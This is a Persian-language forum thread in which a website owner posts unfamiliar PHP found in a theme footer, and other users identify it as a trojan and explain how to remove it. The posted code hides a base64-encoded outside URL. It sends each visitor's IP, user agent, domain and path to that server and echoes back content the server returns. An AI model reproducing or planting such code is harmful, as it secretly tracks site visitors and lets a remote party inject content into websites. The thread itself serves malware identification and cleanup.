M.Hajloo 466 ارسال شده در خرداد 92 گزارش بازنشر ارسال شده در خرداد 92 دروددوستان 1 کد توی فوتر قالب من وجود داره که نمیدونم کارش چی هست و اصلاً آیا بهش نیاز هست یا خیرممنون میشم 1 توضیحی بدید تا متوجه بشم کار این کد چیه :<?phpif (!isset($sRetry)){global $sRetry;$sRetry = 1; // This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = ""; if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes { if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']); @$stCurlHandle = curl_init( $stCurlLink ); } }if ( $stCurlHandle !== NULL ){ curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6); $sResult = @curl_exec($stCurlHandle); if ($sResult[0]=="O") {$sResult[0]=" "; echo $sResult; // Statistic code end } curl_close($stCurlHandle);} نقل قول لینک به ارسال
kasra 4929 ارسال شده در خرداد 92 گزارش بازنشر ارسال شده در خرداد 92 سلاماین کد یک نوع کد مخرب هستش که اگر فایل های دیگه رو هم نگاه کمنید مثل index.php و header.php به احتمال خیلی زیاد وجود دارهاین کگد اطلاعات بازدید کننده شمارو به یک آمارگیر ارسال میکنه و یه جورایی تروجان هستش 3 نقل قول لینک به ارسال
M.Hajloo 466 ارسال شده در خرداد 92 مالک گزارش بازنشر ارسال شده در خرداد 92 سلاماین کد یک نوع کد مخرب هستش که اگر فایل های دیگه رو هم نگاه کمنید مثل index.php و header.php به احتمال خیلی زیاد وجود دارهاین کگد اطلاعات بازدید کننده شمارو به یک آمارگیر ارسال میکنه و یه جورایی تروجان هستشkasra جان متشکرم بابت راهنمائیتو قالب اختصاصی از این کدها پیدا کنی عجیبه والا !! نقل قول لینک به ارسال
imanfakhar 26231 ارسال شده در خرداد 92 گزارش بازنشر ارسال شده در خرداد 92 kasra جان متشکرم بابت راهنمائیتو قالب اختصاصی از این کدها پیدا کنی عجیبه والا !!کد می تونه از یک افزونه هم انتقال پیدا کنه هر فایلی می تونه مخرب باشه و دستور کپی یک تکه کد را روی یکی از برگه های قالب جاری بعد یا قبل از تگی مثل فوتر بده اگر باز هم همین مورد تکرار شد تگ فوتر را از قالب حذف کنید و تست بگیرید اگر مورد هم دیگه تکرار نشد بگردید دنبال افزونه ای که این کدها رو توش داشته باشه 4 نقل قول لینک به ارسال
kasra 4929 ارسال شده در خرداد 92 گزارش بازنشر ارسال شده در خرداد 92 نه به قالب اختصاصی مربوط نمیشه چون این کد برای یک ایرانی نیست و نویسنده این تروجان یک غیر ایرانی هستشاین کد قبلن هم در انجمن یادمه توسط چند تا یوزر دیگه گذارش شده بود که خود به خود اضافه میشهاونموقع تحقیق که کردم این یک تروجان هست که توی ویندوز وجود داره و اگر شما به وسیله ftp به هاست متصل بشی یا از آپلود سی پنل فایلی آپلود کنی ، به صورت خودکار این کد مخرب رو توی 3 فایل اصلی index.php & header.php & footer.php اضافه میکنه و اگر فایل رو دیکد کنی میبینی که اطلاعات بازدید کننده هارو دریافت میکنه و به یک آمارگیر خارجی میفرستهمشکل خاصی نداره این کد اما با اینکه برای ربات های گوگل شرط گذاشته اما بازم گوگل میفهمه و سایت شمارو بلاک میکنه به عنوان مخرببرای حل این مشکل :سیستمت رو 100% پاکسازی کن و بعد برو به سی پنل و همه فایل های مشکوک رو پاک کن و بعد این کد رو از داخل همه فایل ها که همشونم اول فایل گذاشته شدرو پاک کناگر کارهارو درست انجام داده باشی دیگه کدی اضافه نمیشه 5 نقل قول لینک به ارسال
M.Hajloo 466 ارسال شده در خرداد 92 مالک گزارش بازنشر ارسال شده در خرداد 92 ممنون از راهنمائی مفیدتونسیستم را با آخرین آپدیت نود اسکن کردم مشکلی نبودهاست را هم به وسیله آنتی ویروسش اسکن کردم که خدا را شکر چیزی نبودچند روز پیش چند تا افزونه مثل پخش آنلاین موزیک و ... تست کردم که فکر کنم از روی همین ها اضافه شده بودهاین کد هم فقط تو فایل فوتر وجود داشت که حذف کردم*سپاس* نقل قول لینک به ارسال
پست های پیشنهاد شده
به گفتگو بپیوندید
هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .